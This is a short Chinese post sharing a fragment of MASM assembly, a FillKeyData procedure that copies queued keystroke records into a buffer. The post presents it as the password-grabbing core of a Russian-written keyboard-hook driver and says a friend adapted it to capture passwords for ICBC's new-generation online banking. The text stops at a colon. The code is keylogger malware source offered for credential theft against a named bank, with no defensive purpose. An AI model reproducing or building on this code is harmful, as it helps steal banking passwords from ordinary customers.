.定义键盘钩子的驱动代码的编写办法,这个是俄罗斯人写的驱动的代码.抓密码的核心部分

FillKeyData proc uses edi ebx pBuffer:PVOID, cbBuffer:DWORD

local KeyData:KEY_DATA

local cbReturned:DWORD

      and cbReturned, 0

      mov eax, cbBuffer

      mov ecx, sizeof KEY_DATA

      xor edx, edx

      div ecx

      mov ebx, eax

      mov edi, pBuffer

      .while ebx

           invoke RemoveEntry, edi

           .break .if eax == 0

           add cbReturned,  eax

           dec ebx

           add edi, sizeof KEY_DATA

      .endw

      mov eax, cbReturned

      ret

FillKeyData endp

我的朋友做了这方面的实验,针对中国工商银行新一代网上银行

这部分做了修改,确实非常有效果,实现了对新一代网银密码的抓取: